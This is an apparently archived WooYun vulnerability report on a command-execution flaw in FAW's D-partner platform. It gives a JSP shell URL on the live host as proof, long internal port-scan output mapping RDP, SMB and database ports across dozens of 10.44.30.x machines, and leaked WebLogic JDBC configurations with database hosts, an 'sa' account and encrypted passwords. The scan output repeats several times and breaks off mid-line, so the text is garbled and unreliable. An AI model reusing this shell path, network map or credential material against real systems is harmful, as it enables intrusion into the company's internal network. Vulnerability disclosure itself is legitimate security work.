中国第一汽车集团某独立业务系统命令执行（可探测内网近40台机器）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0166025

漏洞标题：中国第一汽车集团某独立业务系统命令执行（可探测内网近40台机器）

漏洞作者：路人甲

提交时间：2015-12-30 14:20

修复时间：2016-01-28 14:11

公开时间：2016-01-28 14:11

漏洞类型：命令执行

危害等级：高

自评Rank：15

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-30：细节已通知厂商并且等待厂商处理中
2016-01-05：厂商已经确认，细节仅向厂商公开
2016-01-15：细节向核心白帽子及相关领域专家公开
2016-01-25：细节向普通白帽子公开
2016-01-28：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

D-partner是英文Driver Partner的缩写，即驾驶者伙伴，是由中国一汽自主研发，利用互联网平台、第三代网络通信技术、全球定位系统、智能语音识别技术以及汽车电子等现代科技手段，为汽车驾驶者、整车厂商、政府机构、行业用户等提供集成化、智能化、可扩展的服务平台。将服务全面延伸到汽车领域，创新汽车生活方式，引领美好汽车生活。

详细说明：

http://www.dpartner.com.cn:8080/ 存在命令执行
小礼物什么时候送到啊！！

漏洞证明：

http://www.dpartner.com.cn:8080/2.jsp?o=index

Result:
10.44.30.4:135 >>> Open
10.44.30.4:3389 >>> Open
10.44.30.11:80 >>> Open
10.44.30.11:135 >>> Open
10.44.30.11:3389 >>> Open
10.44.30.22:135 >>> Open
10.44.30.22:3389 >>> Open
10.44.30.21:3389 >>> Open
10.44.30.23:135 >>> Open
10.44.30.23:3389 >>> Open
10.44.30.34:135 >>> Open
10.44.30.34:3389 >>> Open
10.44.30.35:80 >>> Open
10.44.30.35:3306 >>> Open
10.44.30.35:8080 >>> Open
10.44.30.4:135 >>> Open
10.44.30.4:3389 >>> Open
10.44.30.11:80 >>> Open
10.44.30.11:135 >>> Open
10.44.30.11:3389 >>> Open
10.44.30.22:135 >>> Open
10.44.30.22:3389 >>> Open
10.44.30.21:3389 >>> Open
10.44.30.23:135 >>> Open
10.44.30.23:3389 >>> Open
10.44.30.34:135 >>> Open
10.44.30.34:3389 >>> Open
10.44.30.35:80 >>> Open
10.44.30.35:3306 >>> Open
10.44.30.35:8080 >>> Open
10.44.30.39:3389 >>> Open
10.44.30.39:135 >>> Open
10.44.30.39:80 >>> Open
10.44.30.4
??????? Web??? ??????
Url??
Method: Decode:
  
Referer:
Result:
10.44.30.4:135 >>> Open
10.44.30.4:3389 >>> Open
10.44.30.11:80 >>> Open
10.44.30.11:135 >>> Open
10.44.30.11:3389 >>> Open
10.44.30.22:135 >>> Open
10.44.30.22:3389 >>> Open
10.44.30.21:3389 >>> Open
10.44.30.23:135 >>> Open
10.44.30.23:3389 >>> Open
10.44.30.34:135 >>> Open
10.44.30.34:3389 >>> Open
10.44.30.35:80 >>> Open
10.44.30.35:3306 >>> Open
10.44.30.35:8080 >>> Open
10.44.30.4:135 >>> Open
10.44.30.4:3389 >>> Open
10.44.30.11:80 >>> Open
10.44.30.11:135 >>> Open
10.44.30.11:3389 >>> Open
10.44.30.22:135 >>> Open
10.44.30.22:3389 >>> Open
10.44.30.21:3389 >>> Open
10.44.30.23:135 >>> Open
10.44.30.23:3389 >>> Open
10.44.30.34:135 >>> Open
10.44.30.34:3389 >>> Open
10.44.30.35:80 >>> Open
10.44.30.35:3306 >>> Open
10.44.30.35:8080 >>> Open
10.44.30.39:3389 >>> Open
10.44.30.39:135 >>> Open
10.44.30.39:80 >>> Open
10.44.30.4
??????? Web??? ??????
Url??
Method: Decode:
  
Referer:
Result:
10.44.30.4:135 >>> Open
10.44.30.4:3389 >>> Open
10.44.30.11:80 >>> Open
10.44.30.11:135 >>> Open
10.44.30.11:3389 >>> Open
10.44.30.22:135 >>> Open
10.44.30.22:3389 >>> Open
10.44.30.21:3389 >>> Open
10.44.30.23:135 >>> Open
10.44.30.23:3389 >>> Open
10.44.30.34:135 >>> Open
10.44.30.34:3389 >>> Open
10.44.30.35:80 >>> Open
10.44.30.35:3306 >>> Open
10.44.30.35:8080 >>> Open
10.44.30.4:135 >>> Open
10.44.30.4:3389 >>> Open
10.44.30.11:80 >>> Open
10.44.30.11:135 >>> Open
10.44.30.11:3389 >>> Open
10.44.30.22:135 >>> Open
10.44.30.22:3389 >>> Open
10.44.30.21:3389 >>> Open
10.44.30.23:135 >>> Open
10.44.30.23:3389 >>> Open
10.44.30.34:135 >>> Open
10.44.30.34:3389 >>> Open
10.44.30.35:80 >>> Open
10.44.30.35:3306 >>> Open
10.44.30.35:8080 >>> Open
10.44.30.39:3389 >>> Open
10.44.30.39:135 >>> Open
10.44.30.39:80 >>> Open
10.44.30.49:135 >>> Open
10.44.30.49:3389 >>> Open
10.44.30.50:135 >>> Open
10.44.30.50:3389 >>> Open
10.44.30.51:80 >>> Open
10.44.30.51:135 >>> Open
10.44.30.51:1433 >>> Open
10.44.30.51:3389 >>> Open
10.44.30.52:21 >>> Open
10.44.30.52:80 >>> Open
10.44.30.52:135 >>> Open
10.44.30.52:3389 >>> Open
10.44.30.53:135 >>> Open
10.44.30.53:1433 >>> Open
10.44.30.54:80 >>> Open
10.44.30.54:135 >>> Open
10.44.30.54:3389 >>> Open
10.44.30.55:135 >>> Open
10.44.30.55:3389 >>> Open
10.44.30.56:135 >>> Open
10.44.30.54:21 >>> Open
10.44.30.56:3389 >>> Open
10.44.30.57:135 >>> Open
10.44.30.57:3389 >>> Open
10.44.30.58:135 >>> Open
10.44.30.58:3389 >>> Open
10.44.30.59:135 >>> Open
10.44.30.59:3389 >>> Open
10.44.30.60:135 >>> Open
10.44.30.60:3389 >>> Open
10.44.30.61:135 >>> Open
10.44.30.61:3389 >>> Open
10.44.30.62:135 >>> Open
10.44.30.62:3389 >>> Open
10.44.30.63:135 >>> Open
10.44.30.63:3389 >>> Open
10.44.30.64:135 >>> Open
10.44.30.64:1433 >>> Open
10.44.30.64:3389 >>> Open
10.44.30.65:135 >>> Open
10.44.30.65:3389 >>> Open
10.44.30.66:135 >>> Open
10.44.30.66:3389 >>> Open
10.44.30.67:135 >>> Open
10.44.30.67:3389 >>> Open
10.44.30.68:3389 >>> Open
10.44.30.68:135 >>> Open
10.44.30.69:135 >>> Open
10.44.30.69:3389 >>> Open
10.44.30.76:3389 >>> Open
10.44.30.70:80 >>> Open
10.44.30.70:135 >>> Open
10.44.30.79:3389 >>> Open
10.44.30.75:80 >>> Open
10.44.30.76:135 >>> Open
10.44.30.76:80 >>> Open
10.44.30.79:80 >>> Open
http://127.0.0.1:8080 >> D-partner>>null >>Success
http://127.0.0.12:80 >> D-partner>>null >>Success
http://127.0.0.13:80 >> D-partner>>null >>Success
http://127.0.0.14:80 >> D-partner>>null >>Success
http://127.0.0.15:80 >> D-partner>>null >>Success
http://127.0.0.16:80 >> D-partner>>null >>Success
http://127.0.0.17:80 >> D-partner>>null >>Success
http://127.0.0.18:80 >> D-partner>>null >>Success
http://127.0.0.19:80 >> D-partner>>null >>Success
http://127.0.0.20:80 >> D-partner>>null >>Success
http://127.0.0.21:80 >> D-partner>>null >>Success
http://127.0.0.22:80 >> D-partner>>null >>Success
http://127.0.0.23:80 >> D-partner>>null >>Success
http://127.0.0.26:80 >> D-partner>>null >>Success
http://127.0.0.25:80 >> D-partner>>null >>Success
http://127.0.0.24:80 >> D-partner>>null >>Success
http://127.0.0.27:80 >> D-partner>>null >>Success
http://127.0.0.28:80 >> D-partner>>null >>Success
http://127.0.0.8:80 >> D-partner>>null >>Success
http://127.0.0.9:80 >> D-partner>>null >>Success
http://127.0.0.6:80 >> D-partner>>null >>Success
http://127.0.0.7:80 >> D-partner>>null >>Success
http://127.0.0.1:80 >> D-partner>>null >>Success
http://127.0.0.10:80 >> D-partner>>null >>Success
http://127.0.0.29:80 >> D-partner>>null >>Success
http://127.0.0.5:80 >> D-partner>>null >>Success
http://127.0.0.11:80 >> D-partner>>null >>Success
http://127.0.0.2:80 >> D-partner>>null >>Success
http://127.0.0.30:80 >> D-partner>>null >>Success
http://127.0.0.31:80 >> D-partner>>null >>Success
http://127.0.0.33:80 >> D-partner>>null >>Success
http://127.0.0.32:80 >> D-partner>>null >>Success
http://127.0.0.3:80 >> D-partner>>null >>Success
http://127.0.0.34:80 >> D-partner>>null >>Success
http://127.0.0.4:80 >> D-partner>>null >>Success
http://127.0.0.45:80 >> D-partner>>null >>Success
http://127.0.0.36:80 >> D-partner>>null >>Success
http://127.0.0.35:80 >> D-partner>>null >>Success
http://127.0.0.38:80 >> D-partner>>null >>Success
http://127.0.0.39:80 >> D-partner>>null >>Success
http://127.0.0.44:80 >> D-partner>>null >>Success
http://127.0.0.43:80 >> D-par9:135 >>> Open
10.44.30.49:3389 >>> Open
10.44.30.50:135 >>> Open
10.44.30.50:3389 >>> Open
10.44.30.51:80 >>> Open
10.44.30.51:135 >>> Open
10.44.30.51:1433 >>> Open
10.44.30.51:3389 >>> Open
10.44.30.52:21 >>> Open
10.44.30.52:80 >>> Open
10.44.30.52:135 >>> Open
10.44.30.52:3389 >>> Open
10.44.30.53:135 >>> Open
10.44.30.53:1433 >>> Open
10.44.30.54:80 >>> Open
10.44.30.54:135 >>> Open
10.44.30.54:3389 >>> Open
10.44.30.55:135 >>> Open
10.44.30.55:3389 >>> Open
10.44.30.56:135 >>> Open
10.44.30.54:21 >>> Open
10.44.30.56:3389 >>> Open
10.44.30.57:135 >>> Open
10.44.30.57:3389 >>> Open
10.44.30.58:135 >>> Open
10.44.30.58:3389 >>> Open
10.44.30.59:135 >>> Open
10.44.30.59:3389 >>> Open
10.44.30.60:135 >>> Open
10.44.30.60:3389 >>> Open
10.44.30.61:135 >>> Open
10.44.30.61:3389 >>> Open
10.44.30.62:135 >>> Open
10.44.30.62:3389 >>> Open
10.44.30.63:135 >>> Open
10.44.30.63:3389 >>> Open
10.44.30.64:135 >>> Open
10.44.30.64:1433 >>> Open
10.44.30.64:3389 >>> Open
10.44.30.65:135 >>> Open
10.44.30.65:3389 >>> Open
10.44.30.66:135 >>> Open
10.44.30.66:3389 >>> Open
10.44.30.67:135 >>> Open
10.44.30.67:3389 >>> Open
10.44.30.68:3389 >>> Open
10.44.30.68:135 >>> Open
10.44.30.69:135 >>> Open
10.44.30.69:3389 >>> Open
10.44.30.76:3389 >>> Open
10.44.30.70:80 >>> Open
10.44.30.70:135 >>> Open
10.44.30.79:3389 >>> Open
10.44.30.75:80 >>> Open
10.44.30.76:135 >>> Open
10.44.30.76:80 >>> Open
10.44.30.79:80 >>> Open
http://127.0.0.1:8080 >> D-partner>>null >>Success
http://127.0.0.12:80 >> D-partner>>null >>Success
http://127.0.0.13:80 >> D-partner>>null >>Success
http://127.0.0.14:80 >> D-partner>>null >>Success
http://127.0.0.15:80 >> D-partner>>null >>Success
http://127.0.0.16:80 >> D-partner>>null >>Success
http://127.0.0.17:80 >> D-partner>>null >>Success
http://127.0.0.18:80 >> D-partner>>null >>Success
http://127.0.0.19:80 >> D-partner>>null >>Success
http://127.0.0.20:80 >> D-partner>>null >>Success
http://127.0.0.21:80 >> D-partner>>null >>Success
http://127.0.0.22:80 >> D-partner>>null >>Success
http://127.0.0.23:80 >> D-partner>>null >>Success
http://127.0.0.26:80 >> D-partner>>null >>Success
http://127.0.0.25:80 >> D-partner>>null >>Success
http://127.0.0.24:80 >> D-partner>>null >>Success
http://127.0.0.27:80 >> D-partner>>null >>Success
http://127.0.0.28:80 >> D-partner>>null >>Success
http://127.0.0.8:80 >> D-partner>>null >>Success
http://127.0.0.9:80 >> D-partner>>null >>Success
http://127.0.0.6:80 >> D-partner>>null >>Success
http://127.0.0.7:80 >> D-partner>>null >>Success
http://127.0.0.1:80 >> D-partner>>null >>Success
http://127.0.0.10:80 >> D-partner>>null >>Success
http://127.0.0.29:80 >> D-partner>>null >>Success
http://127.0.0.5:80 >> D-partner>>null >>Success
http://127.0.0.11:80 >> D-partner>>null >>Success
http://127.0.0.2:80 >> D-partner>>null >>Success
http://127.0.0.30:80 >> D-partner>>null >>Success
http://127.0.0.31:80 >> D-partner>>null >>Success
http://127.0.0.33:80 >> D-partner>>null >>Success
http://127.0.0.32:80 >> D-partner>>null >>Success
http://127.0.0.3:80 >> D-partner>>null >>Success
http://127.0.0.34:80 >> D-partner>>null >>Success
http://127.0.0.4:80 >> D-partner>>null >>Success
http://127.0.0.45:80 >> D-partner>>null >>Success
http://127.0.0.36:80 >> D-partner>>null >>Success
http://127.0.0.35:80 >> D-partner>>null >>Success
http://127.0.0.38:80 >> D-partner>>null >>Success
http://127.0.0.39:80 >> D-partner>>null >>Success
http://127.0.0.44:80 >> D-partner>>null >>Success
http://127.0.0.43:80 >> D-partner>>null >>Success
http://127.0.0.113:80 >> D-partner>>null >>Success
http://127.0.0.111:80 >> D-partner>>null >>Success
http://127.0.0.114:80 >> D-partner>>null >>Success
http://127.0.0.115:80 >> D-partner>>null >>Success
9:135 >>> Open
10.44.30.49:3389 >>> Open
10.44.30.50:135 >>> Open
10.44.30.50:3389 >>> Open
10.44.30.51:80 >>> Open
10.44.30.51:135 >>> Open
10.44.30.51:1433 >>> Open
10.44.30.51:3389 >>> Open
10.44.30.52:21 >>> Open
10.44.30.52:80 >>> Open
10.44.30.52:135 >>> Open
10.44.30.52:3389 >>> Open
10.44.30.53:135 >>> Open
10.44.30.53:1433 >>> Open
10.44.30.54:80 >>> Open
10.44.30.54:135 >>> Open
10.44.30.54:3389 >>> Open
10.44.30.55:135 >>> Open
10.44.30.55:3389 >>> Open
10.44.30.56:135 >>> Open
10.44.30.54:21 >>> Open
10.44.30.56:3389 >>> Open
10.44.30.57:135 >>> Open
10.44.30.57:3389 >>> Open
10.44.30.58:135 >>> Open
10.44.30.58:3389 >>> Open
10.44.30.59:135 >>> Open
10.44.30.59:3389 >>> Open
10.44.30.60:135 >>> Open
10.44.30.60:3389 >>> Open
10.44.30.61:135 >>> Open
10.44.30.61:3389 >>> Open
10.44.30.62:135 >>> Open
10.44.30.62:3389 >>> Open
10.44.30.63:135 >>> Open
10.44.30.63:3389 >>> Open
10.44.30.64:135 >>> Open
10.44.30.64:1433 >>> Open
10.44.30.64:3389 >>> Open
10.44.30.65:135 >>> Open
10.44.30.65:3389 >>> Open
10.44.30.66:135 >>> Open
10.44.30.66:3389 >>> Open
10.44.30.67:135 >>> Open
10.44.30.67:3389 >>> Open
10.44.30.68:3389 >>> Open
10.44.30.68:135 >>> Open
10.44.30.69:135 >>> Open
10.44.30.69:3389 >>> Open
10.44.30.76:3389 >>> Open
10.44.30.70:80 >>> Open
10.44.30.70:135 >>> Open
10.44.30.79:3389 >>> Open
10.44.30.75:80 >>> Open
10.44.30.76:135 >>> Open
10.44.30.76:80 >>> Open
10.44.30.79:80 >>> Open
http://127.0.0.1:8080 >> D-partner>>null >>Success
http://127.0.0.12:80 >> D-partner>>null >>Success
http://127.0.0.13:80 >> D-partner>>null >>Success
http://127.0.0.14:80 >> D-partner>>null >>Success
http://127.0.0.15:80 >> D-partner>>null >>Success
http://127.0.0.16:80 >> D-partner>>null >>Success
http://127.0.0.17:80 >> D-partner>>null >>Success
http://127.0.0.18:80 >> D-partner>>null >>Success
http://127.0.0.19:80 >> D-partner>>null >>Success
http://127.0.0.20:80 >> D-partner>>null >>Success
http://127.0.0.21:80 >> D-partner>>null >>Success
http://127.0.0.22:80 >> D-partner>>null >>Success
http://127.0.0.23:80 >> D-partner>>null >>Success
http://127.0.0.26:80 >> D-partner>>null >>Success
http://127.0.0.25:80 >> D-partner>>null >>Success
http://127.0.0.24:80 >> D-partner>>null >>Success
http://127.0.0.27:80 >> D-partner>>null >>Success
http://127.0.0.28:80 >> D-partner>>null >>Success
http://127.0.0.8:80 >> D-partner>>null >>Success
http://127.0.0.9:80 >> D-partner>>null >>Success
http://127.0.0.6:80 >> D-partner>>null >>Success
http://127.0.0.7:80 >> D-partner>>null >>Success
http://127.0.0.1:80 >> D-partner>>null >>Success
http://127.0.0.10:80 >> D-partner>>null >>Success
http://127.0.0.29:80 >> D-partner>>null >>Success
http://127.0.0.5:80 >> D-partner>>null >>Success
http://127.0.0.11:80 >> D-partner>>null >>Success
http://127.0.0.2:80 >> D-partner>>null >>Success
http://127.0.0.30:80 >> D-partner>>null >>Success
http://127.0.0.31:80 >> D-partner>>null >>Success
http://127.0.0.33:80 >> D-partner>>null >>Success
http://127.0.0.32:80 >> D-partner>>null >>Success
http://127.0.0.3:80 >> D-partner>>null >>Success
http://127.0.0.34:80 >> D-partner>>null >>Success
http://127.0.0.4:80 >> D-partner>>null >>Success
http://127.0.0.45:80 >> D-partner>>null >>Success
http://127.0.0.36:80 >> D-partner>>null >>Success
http://127.0.0.35:80 >> D-partner>>null >>Success
http://127.0.0.38:80 >> D-partner>>null >>Success
http://127.0.0.39:80 >> D-partner>>null >>Success
http://127.0.0.44:80 >> D-partner>>null >>Success
http://127.0.0.43:80 >> D-par9:135 >>> Open
10.44.30.49:3389 >>> Open
10.44.30.50:135 >>> Open
10.44.30.50:3389 >>> Open
10.44.30.51:80 >>> Open
10.44.30.51:135 >>> Open
10.44.30.51:1433 >>> Open
10.44.30.51:3389 >>> Open
10.44.30.52:21 >>> Open
10.44.30.52:80 >>> Open
10.44.30.52:135 >>> Open
10.44.30.52:3389 >>> Open
10.44.30.53:135 >>> Open
10.44.30.53:1433 >>> Open
10.44.30.54:80 >>> Open
10.44.30.54:135 >>> Open
10.44.30.54:3389 >>> Open
10.44.30.55:135 >>> Open
10.44.30.55:3389 >>> Open
10.44.30.56:135 >>> Open
10.44.30.54:21 >>> Open
10.44.30.56:3389 >>> Open
10.44.30.57:135 >>> Open
10.44.30.57:3389 >>> Open
10.44.30.58:135 >>> Open
10.44.30.58:3389 >>> Open
10.44.30.59:135 >>> Open
10.44.30.59:3389 >>> Open
10.44.30.60:135 >>> Open
10.44.30.60:3389 >>> Open
10.44.30.61:135 >>> Open
10.44.30.61:3389 >>> Open
10.44.30.62:135 >>> Open
10.44.30.62:3389 >>> Open
10.44.30.63:135 >>> Open
10.44.30.63:3389 >>> Open
10.44.30.64:135 >>> Open
10.44.30.64:1433 >>> Open
10.44.30.64:3389 >>> Open
10.44.30.65:135 >>> Open
10.44.30.65:3389 >>> Open
10.44.30.66:135 >>> Open
10.44.30.66:3389 >>> Open
10.44.30.67:135 >>> Open
10.44.30.67:3389 >>> Open
10.44.30.68:3389 >>> Open
10.44.30.68:135 >>> Open
10.44.30.69:135 >>> Open
10.44.30.69:3389 >>> Open
10.44.30.76:3389 >>> Open
10.44.30.70:80 >>> Open
10.44.30.70:135 >>> Open
10.44.30.79:3389 >>> Open
10.44.30.75:80 >>> Open
10.44.30.76:135 >>> Open
10.44.30.76:80 >>> Open
10.44.30.79:80 >>> Open

<jdbc-driver-params>
    <url>jdbc:weblogic:sqlserver://10.44.30.110:1433</url>
    <driver-name>weblogic.jdbc.sqlserver.SQLServerDriver</driver-name>
    <properties>
      <property>
        <name>user</name>
        <value>sa</value>
      </property>
      <property>
        <name>portNumber</name>
        <value>1433</value>
      </property>
      <property>
        <name>databaseName</name>
        <value>QMWL_DB</value>
      </property>
      <property>
        <name>serverName</name>
        <value>10.44.30.110</value>
      </property>
    </properties>
    <password-encrypted>{AES}8Y0itfYI6/E/+qJZJ/oJCcnuD1dm4uVMGej51eYUgTs=</password-encrypted>
<jdbc-data-source xmlns="http://xmlns.oracle.com/weblogic/jdbc-data-source" xmlns:sec="http://xmlns.oracle.com/weblogic/security" xmlns:wls="http://xmlns.oracle.com/weblogic/security/wls" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.oracle.com/weblogic/jdbc-data-source http://xmlns.oracle.com/weblogic/jdbc-data-source/1.0/jdbc-data-source.xsd">
  <name>tds</name>
  <jdbc-driver-params>
    <url>jdbc:oracle:thin:@10.44.26.9:1521:torcl</url>
    <driver-name>oracle.jdbc.OracleDriver</driver-name>
    <properties>
      <property>
        <name>user</name>
        <value>qm</value>
      </property>
    </properties>
    <password-encrypted>{AES}EHm9JNUh5hnjyAcFAnmWsSoHKkjAJLauS7O7sORiALY=</password-encrypted>

数据库配置

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2016-01-05 11:02

厂商回复：

已经提交运维部门处理

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0166025

漏洞标题：中国第一汽车集团某独立业务系统命令执行（可探测内网近40台机器）

相关厂商：中国第一汽车集团公司

漏洞作者：路人甲

提交时间：2015-12-30 14:20

修复时间：2016-01-28 14:11

公开时间：2016-01-28 14:11

漏洞类型：命令执行

危害等级：高

自评Rank：15

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0166025

漏洞标题：中国第一汽车集团某独立业务系统命令执行（可探测内网近40台机器）

相关厂商：中国第一汽车集团公司

漏洞作者： 路人甲

提交时间：2015-12-30 14:20

修复时间：2016-01-28 14:11

公开时间：2016-01-28 14:11

漏洞类型：命令执行

危害等级：高

自评Rank：15

漏洞状态：厂商已经修复

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0166025"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云